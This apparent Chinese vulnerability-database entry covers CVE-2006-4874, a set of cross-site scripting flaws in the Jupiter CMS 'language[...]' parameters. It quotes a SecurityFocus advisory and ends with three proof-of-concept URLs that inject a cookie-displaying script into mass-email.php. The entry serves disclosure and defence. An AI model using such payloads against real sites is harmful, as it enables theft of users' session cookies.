Jupiter CMS 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111043 漏洞类型 跨站脚本
发布时间 2006-09-15 更新时间 2006-09-28
CVE编号 CVE-2006-4874 CNNVD-ID CNNVD-200609-320
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/28584
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-320
|漏洞详情
JupiterCMS中存在多个跨站脚本攻击(XSS)漏洞,远程攻击者可以通过(a)modules/blocks.php中的(1)language[Adminname]和(2)language[Adminback]参数;(b)modules/register.php中的(3)language[Registertitle]和(4)language[Registertitle2]参数;(c)modules/mass-email.php中的(5)language[Mass-Emailformtitle]、(6)language[Mass-Emailformdesc]、(7)language[Mass-Emailformdesc2]、(8)language[Mass-Emailformdesc3]和(9)language[Mass-Emailformdesc4]参数;(d)modules/register.php中的(10)language[Forgottentitle]、(11)language[Forgottendesc]、(12)language[Forgottendesc2]、(13)language[Forgottendesc3]、(14)language[Forgottendesc4]和(15)language[Forgottendesc5]参数;以及(e)modules/search.php中的(16)language[Searchviewdesc]、(17)language[Searchviewdesc2]、(18)language[Searchviewdesc3]、(19)language[Searchviewdesc4]、(20)language[Searchviewdesc5]、(21)language[Searchviewdesc6]、(22)language[Searchviewdesc7]和(23)language[Searchviewdesc8]参数注入任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/20048/info
   
Jupiter CMSA is prone to multiple input-validation vulnerabilities, including cross-site scripting, SQL-injection, and arbitrary file-upload issues, because the application fails to sanitize user-supplied input. 
   
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, exploit vulnerabilities in the underlying database implementation, or upload and execute arbitrary files within the webserver process. Other attacks are also possible.
  
http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20title]=<script>alert(document.cookie);</script> 
http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20desc]=<script>alert(document.cookie);</script> 
http://www.example.com/modules/mass-email.php?language[Mass-Email%20form%20desc2]=<script>alert(document.cookie);</script>
|参考资料

来源:BID
名称:20048
链接:http://www.securityfocus.com/bid/20048
来源:BUGTRAQ
名称:20060915JupiterCMSMultipleinjections
链接:http://www.securityfocus.com/archive/1/archive/1/446064/100/0/threaded
来源:SREASON
名称:1608
链接:http://securityreason.com/securityalert/1608